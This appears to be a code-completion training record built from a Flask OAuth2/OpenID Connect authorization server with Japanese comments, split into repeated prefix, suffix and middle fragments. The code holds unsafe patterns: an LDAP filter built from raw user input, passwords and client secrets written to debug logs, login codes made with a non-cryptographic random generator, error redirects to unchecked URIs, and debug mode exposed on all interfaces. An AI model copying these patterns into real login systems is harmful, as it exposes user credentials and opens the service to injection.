def check_client_id(client_id):
return col_clients.find_one({'client_id': client_id},{"_id": 0}) != None
# 関数 リダイレクト先指定のチェック
def check_redirect(client_id,redirect_uri):
doc = col_clients.find_one({'client_id': client_id},{"_id": 0})
if doc == None:
return False
for uri in doc['redirect_uris']:
if uri == redirect_uri:
return True
return False
# 関数 スコープのチェック
def check_scope(client_id,scope):
doc = col_clients.find_one({'client_id': client_id},{"_id": 0})
if doc == None:
return False
cscope = doc['scope'].split(" ")
rscope = scope.split(" ")
for req in rscope:
if req not in cscope:
return False
return True
# 関数 クライアントid とsecret のチェック
def check_client_secret(client_id,client_secret):
query = {"client_id": client_id, "client_secret": client_secret}
return col_clients.find_one(query,{"_id": 0}) != None
# 関数 クライアントIDからパスワードを得る
@auth.get_password
def get_pw(client_id):
doc = col_clients.find_one({'client_id': client_id},{'_id': 0,'client_secret': 1 })
if doc != None:
return doc['client_secret']
else:
return None
# 関数 ログインをLDAPサーバーの応答と比較する
def valid_login(user_id,passwd):
server = Server(cf.LDAP_SERVER, port=cf.LDAP_PORTNO, use_ssl=cf.USE_LDAPS)
conn = Connection(server, cf.LDAP_USER, cf.LDAP_PASSWD, auto_bind=True)
user_filter = '(&(objectclass=inetOrgPerson)(uid=%s))' % (user_id)
conn.search(cf.LDAP_DOMAIN, user_filter, attributes=['uid','userPassword'])
for entry in conn.entries:
data_json = json.loads(entry.entry_to_json())
app.logger.debug("==================")
app.logger.debug(data_json)
app.logger.debug("==================")
ssha_pw = data_json['attributes']['userPassword'][0]
check = ssha.checkPassword( passwd, ssha_pw, suffixed = True, salt_size = 4, debug = 3)
return check
def search_ldap(user_id):
server = Server(cf.LDAP_SERVER, port=cf.LDAP_PORTNO, use_ssl=cf.USE_LDAPS)
conn = Connection(server, cf.LDAP_USER, cf.LDAP_PASSWD, auto_bind=True)
user_filter = '(&(objectclass=inetOrgPerson)(uid=%s))' % (user_id)
conn.search(cf.LDAP_DOMAIN, user_filter, attributes=['uid','sn','cn','ou','userPassword'])
for entry in conn.entries:
data_json = json.loads(entry.entry_to_json())
app.logger.debug("xxxxxxxxxxxxxxxxxx")
app.logger.debug(data_json)
app.logger.debug(data_json['attributes'])
app.logger.debug("xxxxxxxxxxxxxxxxxx")
return data_json['attributes']
#
# JWT生成 アクセストークン
#
def create_access_token(apl_id,user_id):
app.logger.debug("create_access_token ")
header = {
'typ': 'JWT',
'alg': 'RS256',
'kid': 'authserver',
}
payload = {
"iss": "Auth_Server",
"sub": apl_id,
"aud": user_id,
'iat': int(time.time()), # 現在時刻
'exp': int(time.time()) + 3600, # 有効期限時刻 1時間
"scope": "openid profile email address phone read:appointments"
}
with open('key-private.pem', 'rb') as f:
key = f.read()
return jwt.encode(header, payload, key).decode()
#-------------------------------------
#
# ダミーのトップページを表示
# 認証認可サーバーであることを表示
#
@app.route('/')
def home():
return render_template('index.html', title='plane-test', name="home")
#
# 公開鍵の配布
#
@app.route('/publickey')
def download_file():
path = "/app/key-public.pem"
return send_file(path)
#
# 認証と認可
#
# クライアント(アプリ)からの要求を受けて、
# 認証画面(ログイン)フォームを表示する
#
# 不正アクセス防止のチェックで問題が検知されたら error をつけて
# リダイレクト先へリクエストを送る
#
@app.route('/authorize')
def authorize():
app.logger.debug(request.url)
app.logger.debug(request.method)
qs = urllib.parse.urlparse(request.url)
query = dict(urllib.parse.parse_qsl(qs.query))
app.logger.debug(query)
# reqid を生成して、/authn でチェックする
# フォームの隠しフィールドにreqid をセットして、次でチェックする。
reqid = get_random_string(8)
app.logger.debug("client_id = " + query['client_id'])
#app.logger.debug("client_secret = " + query['client_secret'])
app.logger.debug("redirect_uri = " + query['redirect_uri'])
app.logger.debug("scope = " + query['scope'])
app.logger.debug("state = " + query['state'])
app.logger.debug("response_type = " + query['response_type'])
app.logger.debug("reqid = " + reqid)
# クライアントIDの存在チェック
# クライアントID(アプリID)は、事前に認証サーバーに登録されていないといけない
if check_client_id(query['client_id']) == False:
app.logger.debug('Unknown client = ' + query['client_id'])
resp = { 'error': 'Unknown client' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# リダイレクトURLのチェック
# リダイレクト先URIも、事前に認証サーバーに登録されていなければならない
if check_redirect(query['client_id'],query['redirect_uri']) == False:
app.logger.debug('Invalid redirect URI = ' + query['client_id'],query['redirect_uri'])
resp = { 'error': 'Invalid redirect URI' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# 次の処理を照合するためにDBへ保存する
requests[reqid] = qs.query
# 個人を認証(ログイン)フォームを表示
return render_template('authorize.html',
client_id=query['client_id'],
redirect_uri=query['redirect_uri'],
state=query['state'],
reqid=reqid,scope=query['scope'])
#
# 認証(ログイン)フォームからのインプットを受け、
# ユーザーIDとパスワードを照合して、一致していれば、認証は成功とする
#
## Approve
@app.route('/approve', methods=['POST', 'GET'])
def authn():
## 認証の処理を実行
## QSの存在チェック 無ければエラー応答
## QSの内容は?
## 1. client_id
## 2. redirect_uris
## 3. state
##
## レスポンスタイプ code であれば処理
## scope の範囲の逸脱が無いことをチェック
#
# ユーザーの認証もここで実施
#
# user: フォームから取得
# scope: フォームから取得
# client_id: QSから取得
# code, state のQSをつけて、リダイレクト先へ転送する
query_recv = urllib.parse.urlparse(request.url)
query = dict(urllib.parse.parse_qsl(query_recv.query))
# reqidをキーとして送ったQuery String を取り出して
# 辞書からキーreqidの値を削除する
reqid = request.form['reqid']
query_sent = None
squery = {}
if reqid in requests:
query_sent = requests.pop(reqid)
squery = dict(urllib.parse.parse_qsl(query_sent))
else:
# 送信したQuery String のIDが無ければ、不正としてエラーを返す
app.logger.debug('No matching authorization request [' + reqid + ']')
resp = { 'error': 'No matching authorization request' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
app.logger.debug(query_recv)
app.logger.debug("client_id = " + query['client_id'])
app.logger.debug("username = " + request.form['username'])
app.logger.debug("password = " + request.form['password'])
#app.logger.debug("scope = " + request.form['scope'])
#app.logger.debug("scope2 = " + request.form.getlist['scope2'])
app.logger.debug("scope2 ======")
scope2 = request.form.getlist('scope2')
scope = ""
n = 0
for x in scope2:
if n == 0:
scope = x
else:
scope = scope + " " + x
n = n + 1
app.logger.debug("scope = " + scope)
app.logger.debug(scope)
app.logger.debug("redirect_uri = " + query['redirect_uri'])
app.logger.debug("state = " + query['state'])
#############################################################
# 認証 ユーザーID と パスワードのチェック LDAPで照合
#############################################################
if valid_login(request.form['username'],request.form['password']):
app.logger.debug("認証成功")
else:
resp = { 'error': 'id or password failed' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
if 'approve' not in request.form:
resp = { 'error': 'access_denied' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
app.logger.debug("approve = " + request.form['approve'])
# 送信したQSのレスポンスタイプがcodeで無ければエラーを返す
if squery['response_type'] != 'code':
resp = { 'error': 'unsupported_response_type' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# code へ 8桁のランダムな文字列セット
code = get_random_string(8)
# QSを追加して、リダイレクトするURIを作る
resp_qs = {}
resp_qs['code'] = code # ランダムな文字列を生成してセット
resp_qs['state'] = query['state'] # クライアントから出されたランダム文字列
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp_qs)
app.logger.debug("URL = " + url)
# スコープのチェック
#if not check_scope(query['client_id'], request.form['scope']):
if not check_scope(query['client_id'], scope):
resp = { 'error': 'unsupported_response_type' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# code をキーにして以下を保存する
codes[code] = {
'request': query_recv,
'sco | turn response
#
# 認証の成功を受けて、
# access_token, id_token を発行してアプリへ提供する
#
@app.route('/token', methods=['POST', 'GET'])
@auth.login_required
def token():
app.logger.debug("/token")
app.logger.debug(request.headers)
app.logger.debug(request.form)
clientId = None
clientSecret = None
# authorizationヘッダーから client_id と client_secret を取り出す
if 'authorization' in request.headers:
app.logger.debug("authorization = " + request.headers['authorization'])
app.logger.debug("client_id = " + auth.username())
app.logger.debug("client_secret = " + get_pw(auth.username()))
clientId = auth.username()
clientSecret = get_pw(auth.username())
# client_id がPOSTされていればclient_id と client_secret を取り出す
if 'client_id' in request.form:
# clientId が二つの方法で送られてきたら不審なクライアントと判断
if clientId != None:
app.logger.debug('Client attempted to authenticate with multiple methods')
return {'error': 'invalid_client'}, 401
clientId = request.form['client_id']
clientSecret = request.form['client_secret']
# client_id の存在と一致のチェック
if check_client_id(clientId) == False:
app.logger.debug('Unknown client ' + clientId)
return {'error': 'invalid_client'}, 401
# client_secret パスワードの一致チェック
if check_client_secret(clientId,clientSecret) == False:
app.logger.debug('Mismatched client secret')
return {'error': 'invalid_client'}, 401
app.logger.debug("code = " + request.form['code'])
app.logger.debug("redirect_uri = " + request.form['redirect_uri'])
app.logger.debug("grant_type = " + request.form['grant_type'])
# grant_type のチェック
if request.form['grant_type'] != 'authorization_code':
app.logger.debug('Unknown grant type ' + request.form['grant_type'])
return {'error': 'unsupported_grant_type'}, 400
# リクエストのコードがDBに存在していなければエラー応答
code = request.form['code']
if code not in codes:
app.logger.debug('Unknown code ' + code)
return {'error': 'Unknown code '}, 400
# 自己のDBからcodeを削除して再利用を防止する
code = codes.pop(code)
###
### アクセストークン作成
###
# アクセストークンは 2つの方法がある
# 1 乱数文字を生成、対応する情報をKVSでアプリと共有する
# 2 JWTを作成 アプリでJWTをバリデーションすることで情報をエル
# 以下は
# ランダムな文字列でアクセストークンを生成
# アプリサーバーが、リソースサーバーへアクセスする際に
# HTTPヘッダのAuthorization にaccess_token をセットする。
# つまり、JWTをセットすることも可能であり、ISTIOにも適用できるだろう
#
#access_token = get_random_string(26)
access_token = create_access_token(clientId, get_userinfo(code['user']))
app.logger.debug("access_token = ")
app.logger.debug(access_token)
#>>> claims = jwt.decode(s, read_file('public.pem'))
#>>> print(claims)
#{'iss': 'Authlib', 'sub': '123', ...}
#>>> print(claims.header)
#{'alg': 'RS256', 'typ': 'JWT'}
#>>> claims.validate()
# NoSQLに保存
# access_token はNoSQLに登録しておき、リソースサーバーでNoSQLをアクセスして
# access_token を照合して、不一致であればアクセスを拒否する
access_token_data = {
'access_token': access_token,
'client_id': clientId,
'scope': code['scope'],
'user': get_userinfo(code['user'])
}
col_atoken.insert_one(access_token_data)
###
### IDトークンを作成
###
# スコープをセット
cscope = None
if 'scope' in code:
cscope = code['scope']
app.logger.debug("toke_response")
token_response = {
'access_token': access_token,
'token_type': 'Bearer',
'scope': cscope
}
# スコープにopenid が存在、ユーザーがセットされていたら
work_scope = code['scope'].split(" ")
if ('openid' in work_scope ) and ('user' in code):
header = {
'typ': 'JWT',
'alg': 'RS256',
'kid': 'authserver'
}
#
# LDAPからユーザーの属性をセットする
#
app.logger.debug("mongo user = " + code['user'])
app.logger.debug("mongo client_id = " + code['client_id'])
for c in code:
app.logger.debug(c)
user_info = search_ldap(code['user'])
app.logger.debug("user_info = " + user_info['cn'][0])
#
# OIDCのペイロード
# 参考 https://qiita.com/TakahikoKawasaki/items/8f0e422c7edd2d220e06
# https://openid.net/specs/openid-connect-core-1_0.html#StandardClaims
#
payload = {
'iss': cf.OAUTH_SERVER_URL, # 認証サーバーのURLアドレス
'sub': code['user'], # 一意のユーザーUID
'aud': code['client_id'], # 認可を受けたアプリID
'name': user_info['cn'][0], # ユーザー名
'iat': int(time.time()), # 現在時刻
'exp': int(time.time()) + 300 # 有効期限時刻 5分
}
# リクエストのnonceが入っていれば nonceを追加する
if 'request' in code:
if 'nonce' in code['request']:
payload['nonce'] = code['request']['nonce']
# JWTの生成
with open('key-private.pem', 'rb') as f:
prvkey = f.read()
id_token = jwt.encode(header, payload, prvkey)
app.logger.debug('Issued tokens for code ' + id_token.decode())
app.logger.debug('id_tokenはバイナリからストリング化する')
token_response['id_token'] = id_token.decode()
app.logger.debug('id_tokenはバイナリからストリング化した')
return token_response, 200
##
## MAIN
##
if __name__ == '__main__':
api = Api(app)
bx_port = os.getenv("PORT")
listen_port = int(bx_port if bx_port else 5000)
app.run(host='0.0.0.0', port=listen_port, debug=True)
| pe': scope, #request.form['scope'],
'user': request.form['username'],
'client_id': query['client_id']
};
response = redirect(url, code=302)
re | conditional_block |
app.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# 認証認可サーバー
#
import os
import uuid
import json
import hashlib
import requests
import time
import base64
import auth_config as cf
# Flaskフレームワーク関連
from flask import Flask,render_template,make_response,request,send_from_directory,redirect,send_file
from flask_restful import Resource,Api,reqparse
from flask_httpauth import HTTPBasicAuth
# https://flask-cors.readthedocs.io/en/latest/
from flask_cors import CORS
# OAuth2関連
#import python_jwt as jwt, jwcrypto.jwk as jwk, datetime
from authlib.jose import jwt
# LDAP関連
from ldap3 import Server, Connection, ALL
from pySSHA import ssha
from base64 import b64encode as encode
from base64 import b64decode as decode
# URL操作
import urllib.parse
# アクセストークンDB MongoDB
from pymongo import MongoClient
from datetime import datetime
#MONGO_SERVER = 'mongo'
#MONGO_PORT = 27017
#MONGO_DATABASE = 'oidc_database'
#MONGO_COLLECTION_ACCESS_TOKEN = "access_token"
#MONGO_COLLECTION_CLIENTS = "clients"
#MONGO_COLLECTION_USERINFO = "userinfo"
client = MongoClient(cf.MONGO_SERVER, cf.MONGO_PORT)
db = client[cf.MONGO_DATABASE]
col_atoken = db[cf.MONGO_COLLECTION_ACCESS_TOKEN]
col_clients = db[cf.MONGO_COLLECTION_CLIENTS]
col_userinfo = db[cf.MONGO_COLLECTION_USERINFO]
# LDAP関連
from ldap3 import Server, Connection, ALL
from pySSHA import ssha
from base64 import b64encode as encode
from base64 import b64decode as decode
#LDAP_SERVER='ldap.labo.local'
#LDAP_PORTNO=636
#USE_LDAPS=True
#LDAP_DOMAIN='dc=labo,dc=local'
#LDAP_USER='cn=Manager,dc=labo,dc=local'
#LDAP_PASSWD='secret'
# 認証サーバーのアドレス
#OAUTH_SERVER_URL='http://localhost:5810/'
# Flaskの初期化
# ブラウザのJavaScriptからヘッダー Authorization を読み取れるようにするための設定を加える
# Cross-Origin Resource Sharing (CORS) を設定して、他オリジンからのアクセスを許可する
# 参考 https://flask-cors.readthedocs.io/en/latest/
#
app = Flask(__name__, static_url_path='/public')
app.config['CORS_EXPOSE_HEADERS'] = "*"
CORS(app)
auth = HTTPBasicAuth()
codes = {}
requests = {}
#-------------------------------------
# 関数 ユーザー名から取得
def get_userinfo(user):
return col_userinfo.find_one({'uid': user},{"_id": 0})
# 関数 ランダム文字列生成
import random, string
def get_random_string(n):
return ''.join(random.choices(string.ascii_letters + string.digits, k=n))
# 関数 cli |
#
def check_client_id(client_id):
return col_clients.find_one({'client_id': client_id},{"_id": 0}) != None
# 関数 リダイレクト先指定のチェック
def check_redirect(client_id,redirect_uri):
doc = col_clients.find_one({'client_id': client_id},{"_id": 0})
if doc == None:
return False
for uri in doc['redirect_uris']:
if uri == redirect_uri:
return True
return False
# 関数 スコープのチェック
def check_scope(client_id,scope):
doc = col_clients.find_one({'client_id': client_id},{"_id": 0})
if doc == None:
return False
cscope = doc['scope'].split(" ")
rscope = scope.split(" ")
for req in rscope:
if req not in cscope:
return False
return True
# 関数 クライアントid とsecret のチェック
def check_client_secret(client_id,client_secret):
query = {"client_id": client_id, "client_secret": client_secret}
return col_clients.find_one(query,{"_id": 0}) != None
# 関数 クライアントIDからパスワードを得る
@auth.get_password
def get_pw(client_id):
doc = col_clients.find_one({'client_id': client_id},{'_id': 0,'client_secret': 1 })
if doc != None:
return doc['client_secret']
else:
return None
# 関数 ログインをLDAPサーバーの応答と比較する
def valid_login(user_id,passwd):
server = Server(cf.LDAP_SERVER, port=cf.LDAP_PORTNO, use_ssl=cf.USE_LDAPS)
conn = Connection(server, cf.LDAP_USER, cf.LDAP_PASSWD, auto_bind=True)
user_filter = '(&(objectclass=inetOrgPerson)(uid=%s))' % (user_id)
conn.search(cf.LDAP_DOMAIN, user_filter, attributes=['uid','userPassword'])
for entry in conn.entries:
data_json = json.loads(entry.entry_to_json())
app.logger.debug("==================")
app.logger.debug(data_json)
app.logger.debug("==================")
ssha_pw = data_json['attributes']['userPassword'][0]
check = ssha.checkPassword( passwd, ssha_pw, suffixed = True, salt_size = 4, debug = 3)
return check
def search_ldap(user_id):
server = Server(cf.LDAP_SERVER, port=cf.LDAP_PORTNO, use_ssl=cf.USE_LDAPS)
conn = Connection(server, cf.LDAP_USER, cf.LDAP_PASSWD, auto_bind=True)
user_filter = '(&(objectclass=inetOrgPerson)(uid=%s))' % (user_id)
conn.search(cf.LDAP_DOMAIN, user_filter, attributes=['uid','sn','cn','ou','userPassword'])
for entry in conn.entries:
data_json = json.loads(entry.entry_to_json())
app.logger.debug("xxxxxxxxxxxxxxxxxx")
app.logger.debug(data_json)
app.logger.debug(data_json['attributes'])
app.logger.debug("xxxxxxxxxxxxxxxxxx")
return data_json['attributes']
#
# JWT生成 アクセストークン
#
def create_access_token(apl_id,user_id):
app.logger.debug("create_access_token ")
header = {
'typ': 'JWT',
'alg': 'RS256',
'kid': 'authserver',
}
payload = {
"iss": "Auth_Server",
"sub": apl_id,
"aud": user_id,
'iat': int(time.time()), # 現在時刻
'exp': int(time.time()) + 3600, # 有効期限時刻 1時間
"scope": "openid profile email address phone read:appointments"
}
with open('key-private.pem', 'rb') as f:
key = f.read()
return jwt.encode(header, payload, key).decode()
#-------------------------------------
#
# ダミーのトップページを表示
# 認証認可サーバーであることを表示
#
@app.route('/')
def home():
return render_template('index.html', title='plane-test', name="home")
#
# 公開鍵の配布
#
@app.route('/publickey')
def download_file():
path = "/app/key-public.pem"
return send_file(path)
#
# 認証と認可
#
# クライアント(アプリ)からの要求を受けて、
# 認証画面(ログイン)フォームを表示する
#
# 不正アクセス防止のチェックで問題が検知されたら error をつけて
# リダイレクト先へリクエストを送る
#
@app.route('/authorize')
def authorize():
app.logger.debug(request.url)
app.logger.debug(request.method)
qs = urllib.parse.urlparse(request.url)
query = dict(urllib.parse.parse_qsl(qs.query))
app.logger.debug(query)
# reqid を生成して、/authn でチェックする
# フォームの隠しフィールドにreqid をセットして、次でチェックする。
reqid = get_random_string(8)
app.logger.debug("client_id = " + query['client_id'])
#app.logger.debug("client_secret = " + query['client_secret'])
app.logger.debug("redirect_uri = " + query['redirect_uri'])
app.logger.debug("scope = " + query['scope'])
app.logger.debug("state = " + query['state'])
app.logger.debug("response_type = " + query['response_type'])
app.logger.debug("reqid = " + reqid)
# クライアントIDの存在チェック
# クライアントID(アプリID)は、事前に認証サーバーに登録されていないといけない
if check_client_id(query['client_id']) == False:
app.logger.debug('Unknown client = ' + query['client_id'])
resp = { 'error': 'Unknown client' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# リダイレクトURLのチェック
# リダイレクト先URIも、事前に認証サーバーに登録されていなければならない
if check_redirect(query['client_id'],query['redirect_uri']) == False:
app.logger.debug('Invalid redirect URI = ' + query['client_id'],query['redirect_uri'])
resp = { 'error': 'Invalid redirect URI' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# 次の処理を照合するためにDBへ保存する
requests[reqid] = qs.query
# 個人を認証(ログイン)フォームを表示
return render_template('authorize.html',
client_id=query['client_id'],
redirect_uri=query['redirect_uri'],
state=query['state'],
reqid=reqid,scope=query['scope'])
#
# 認証(ログイン)フォームからのインプットを受け、
# ユーザーIDとパスワードを照合して、一致していれば、認証は成功とする
#
## Approve
@app.route('/approve', methods=['POST', 'GET'])
def authn():
## 認証の処理を実行
## QSの存在チェック 無ければエラー応答
## QSの内容は?
## 1. client_id
## 2. redirect_uris
## 3. state
##
## レスポンスタイプ code であれば処理
## scope の範囲の逸脱が無いことをチェック
#
# ユーザーの認証もここで実施
#
# user: フォームから取得
# scope: フォームから取得
# client_id: QSから取得
# code, state のQSをつけて、リダイレクト先へ転送する
query_recv = urllib.parse.urlparse(request.url)
query = dict(urllib.parse.parse_qsl(query_recv.query))
# reqidをキーとして送ったQuery String を取り出して
# 辞書からキーreqidの値を削除する
reqid = request.form['reqid']
query_sent = None
squery = {}
if reqid in requests:
query_sent = requests.pop(reqid)
squery = dict(urllib.parse.parse_qsl(query_sent))
else:
# 送信したQuery String のIDが無ければ、不正としてエラーを返す
app.logger.debug('No matching authorization request [' + reqid + ']')
resp = { 'error': 'No matching authorization request' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
app.logger.debug(query_recv)
app.logger.debug("client_id = " + query['client_id'])
app.logger.debug("username = " + request.form['username'])
app.logger.debug("password = " + request.form['password'])
#app.logger.debug("scope = " + request.form['scope'])
#app.logger.debug("scope2 = " + request.form.getlist['scope2'])
app.logger.debug("scope2 ======")
scope2 = request.form.getlist('scope2')
scope = ""
n = 0
for x in scope2:
if n == 0:
scope = x
else:
scope = scope + " " + x
n = n + 1
app.logger.debug("scope = " + scope)
app.logger.debug(scope)
app.logger.debug("redirect_uri = " + query['redirect_uri'])
app.logger.debug("state = " + query['state'])
#############################################################
# 認証 ユーザーID と パスワードのチェック LDAPで照合
#############################################################
if valid_login(request.form['username'],request.form['password']):
app.logger.debug("認証成功")
else:
resp = { 'error': 'id or password failed' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
if 'approve' not in request.form:
resp = { 'error': 'access_denied' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
app.logger.debug("approve = " + request.form['approve'])
# 送信したQSのレスポンスタイプがcodeで無ければエラーを返す
if squery['response_type'] != 'code':
resp = { 'error': 'unsupported_response_type' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# code へ 8桁のランダムな文字列セット
code = get_random_string(8)
# QSを追加して、リダイレクトするURIを作る
resp_qs = {}
resp_qs['code'] = code # ランダムな文字列を生成してセット
resp_qs['state'] = query['state'] # クライアントから出されたランダム文字列
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp_qs)
app.logger.debug("URL = " + url)
# スコープのチェック
#if not check_scope(query['client_id'], request.form['scope']):
if not check_scope(query['client_id'], scope):
resp = { 'error': 'unsupported_response_type' }
url = query['redirect_uri'] + "?" + urllib.parse.urlencode(resp)
response = redirect(url, code=302)
return response
# code をキーにして以下を保存する
codes[code] = {
'request': query_recv,
'scope': scope, #request.form['scope'],
'user': request.form['username'],
'client_id': query['client_id']
};
response = redirect(url, code=302)
return response
#
# 認証の成功を受けて、
# access_token, id_token を発行してアプリへ提供する
#
@app.route('/token', methods=['POST', 'GET'])
@auth.login_required
def token():
app.logger.debug("/token")
app.logger.debug(request.headers)
app.logger.debug(request.form)
clientId = None
clientSecret = None
# authorizationヘッダーから client_id と client_secret を取り出す
if 'authorization' in request.headers:
app.logger.debug("authorization = " + request.headers['authorization'])
app.logger.debug("client_id = " + auth.username())
app.logger.debug("client_secret = " + get_pw(auth.username()))
clientId = auth.username()
clientSecret = get_pw(auth.username())
# client_id がPOSTされていればclient_id と client_secret を取り出す
if 'client_id' in request.form:
# clientId が二つの方法で送られてきたら不審なクライアントと判断
if clientId != None:
app.logger.debug('Client attempted to authenticate with multiple methods')
return {'error': 'invalid_client'}, 401
clientId = request.form['client_id']
clientSecret = request.form['client_secret']
# client_id の存在と一致のチェック
if check_client_id(clientId) == False:
app.logger.debug('Unknown client ' + clientId)
return {'error': 'invalid_client'}, 401
# client_secret パスワードの一致チェック
if check_client_secret(clientId,clientSecret) == False:
app.logger.debug('Mismatched client secret')
return {'error': 'invalid_client'}, 401
app.logger.debug("code = " + request.form['code'])
app.logger.debug("redirect_uri = " + request.form['redirect_uri'])
app.logger.debug("grant_type = " + request.form['grant_type'])
# grant_type のチェック
if request.form['grant_type'] != 'authorization_code':
app.logger.debug('Unknown grant type ' + request.form['grant_type'])
return {'error': 'unsupported_grant_type'}, 400
# リクエストのコードがDBに存在していなければエラー応答
code = request.form['code']
if code not in codes:
app.logger.debug('Unknown code ' + code)
return {'error': 'Unknown code '}, 400
# 自己のDBからcodeを削除して再利用を防止する
code = codes.pop(code)
###
### アクセストークン作成
###
# アクセストークンは 2つの方法がある
# 1 乱数文字を生成、対応する情報をKVSでアプリと共有する
# 2 JWTを作成 アプリでJWTをバリデーションすることで情報をエル
# 以下は
# ランダムな文字列でアクセストークンを生成
# アプリサーバーが、リソースサーバーへアクセスする際に
# HTTPヘッダのAuthorization にaccess_token をセットする。
# つまり、JWTをセットすることも可能であり、ISTIOにも適用できるだろう
#
#access_token = get_random_string(26)
access_token = create_access_token(clientId, get_userinfo(code['user']))
app.logger.debug("access_token = ")
app.logger.debug(access_token)
#>>> claims = jwt.decode(s, read_file('public.pem'))
#>>> print(claims)
#{'iss': 'Authlib', 'sub': '123', ...}
#>>> print(claims.header)
#{'alg': 'RS256', 'typ': 'JWT'}
#>>> claims.validate()
# NoSQLに保存
# access_token はNoSQLに登録しておき、リソースサーバーでNoSQLをアクセスして
# access_token を照合して、不一致であればアクセスを拒否する
access_token_data = {
'access_token': access_token,
'client_id': clientId,
'scope': code['scope'],
'user': get_userinfo(code['user'])
}
col_atoken.insert_one(access_token_data)
###
### IDトークンを作成
###
# スコープをセット
cscope = None
if 'scope' in code:
cscope = code['scope']
app.logger.debug("toke_response")
token_response = {
'access_token': access_token,
'token_type': 'Bearer',
'scope': cscope
}
# スコープにopenid が存在、ユーザーがセットされていたら
work_scope = code['scope'].split(" ")
if ('openid' in work_scope ) and ('user' in code):
header = {
'typ': 'JWT',
'alg': 'RS256',
'kid': 'authserver'
}
#
# LDAPからユーザーの属性をセットする
#
app.logger.debug("mongo user = " + code['user'])
app.logger.debug("mongo client_id = " + code['client_id'])
for c in code:
app.logger.debug(c)
user_info = search_ldap(code['user'])
app.logger.debug("user_info = " + user_info['cn'][0])
#
# OIDCのペイロード
# 参考 https://qiita.com/TakahikoKawasaki/items/8f0e422c7edd2d220e06
# https://openid.net/specs/openid-connect-core-1_0.html#StandardClaims
#
payload = {
'iss': cf.OAUTH_SERVER_URL, # 認証サーバーのURLアドレス
'sub': code['user'], # 一意のユーザーUID
'aud': code['client_id'], # 認可を受けたアプリID
'name': user_info['cn'][0], # ユーザー名
'iat': int(time.time()), # 現在時刻
'exp': int(time.time()) + 300 # 有効期限時刻 5分
}
# リクエストのnonceが入っていれば nonceを追加する
if 'request' in code:
if 'nonce' in code['request']:
payload['nonce'] = code['request']['nonce']
# JWTの生成
with open('key-private.pem', 'rb') as f:
prvkey = f.read()
id_token = jwt.encode(header, payload, prvkey)
app.logger.debug('Issued tokens for code ' + id_token.decode())
app.logger.debug('id_tokenはバイナリからストリング化する')
token_response['id_token'] = id_token.decode()
app.logger.debug('id_tokenはバイナリからストリング化した')
return token_response, 200
##
## MAIN
##
if __name__ == '__main__':
api = Api(app)
bx_port = os.getenv("PORT")
listen_port = int(bx_port if bx_port else 5000)
app.run(host='0.0.0.0', port=listen_port, debug=True)
| ent_id のチェック | identifier_name |
app.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# 認証認可サーバー
#
import os
import uuid
import json
import hashlib
import requests
import time
import base64
import auth_config as cf
# Flaskフレームワーク関連
from flask import Flask,render_template,make_response,request,send_from_directory,redirect,send_file
from flask_restful import Resource,Api,reqparse
from flask_httpauth import HTTPBasicAuth
# https://flask-cors.readthedocs.io/en/latest/
from flask_cors import CORS
# OAuth2関連
#import python_jwt as jwt, jwcrypto.jwk as jwk, datetime
from authlib.jose import jwt
# LDAP関連
from ldap3 import Server, Connection, ALL
from pySSHA import ssha
from base64 import b64encode as encode
from base64 import b64decode as decode
# URL操作
import urllib.parse
# アクセストークンDB MongoDB
from pymongo import MongoClient
from datetime import datetime
#MONGO_SERVER = 'mongo'
#MONGO_PORT = 27017
#MONGO_DATABASE = 'oidc_database'
#MONGO_COLLECTION_ACCESS_TOKEN = "access_token"
#MONGO_COLLECTION_CLIENTS = "clients"
#MONGO_COLLECTION_USERINFO = "userinfo"
client = MongoClient(cf.MONGO_SERVER, cf.MONGO_PORT)
db = client[cf.MONGO_DATABASE]
col_atoken = db[cf.MONGO_COLLECTION_ACCESS_TOKEN]
col_clients = db[cf.MONGO_COLLECTION_CLIENTS]
col_userinfo = db[cf.MONGO_COLLECTION_USERINFO]
# LDAP関連
from ldap3 import Server, Connection, ALL
from pySSHA import ssha
from base64 import b64encode as encode
from base64 import b64decode as decode
#LDAP_SERVER='ldap.labo.local'
#LDAP_PORTNO=636
#USE_LDAPS=True
#LDAP_DOMAIN='dc=labo,dc=local'
#LDAP_USER='cn=Manager,dc=labo,dc=local'
#LDAP_PASSWD='secret'
# 認証サーバーのアドレス
#OAUTH_SERVER_URL='http://localhost:5810/'
# Flaskの初期化
# ブラウザのJavaScriptからヘッダー Authorization を読み取れるようにするための設定を加える
# Cross-Origin Resource Sharing (CORS) を設定して、他オリジンからのアクセスを許可する
# 参考 https://flask-cors.readthedocs.io/en/latest/
#
app = Flask(__name__, static_url_path='/public')
app.config['CORS_EXPOSE_HEADERS'] = "*"
CORS(app)
auth = HTTPBasicAuth()
codes = {}
requests = {}
#-------------------------------------
# 関数 ユーザー名から取得
def get_userinfo(user):
return col_userinfo.find_one({'uid': user},{"_id": 0})
# 関数 ランダム文字列生成
import random, string
def get_random_string(n):
return ''.join(random.choices(string.ascii_letters + string.digits, k=n))
# 関数 client_id のチェック
#
def check_client_id(client_id):
return col_clients.find_one({'client_id': client_id},{"_id": 0}) != None
# 関数 リダイレクト先指定のチェック
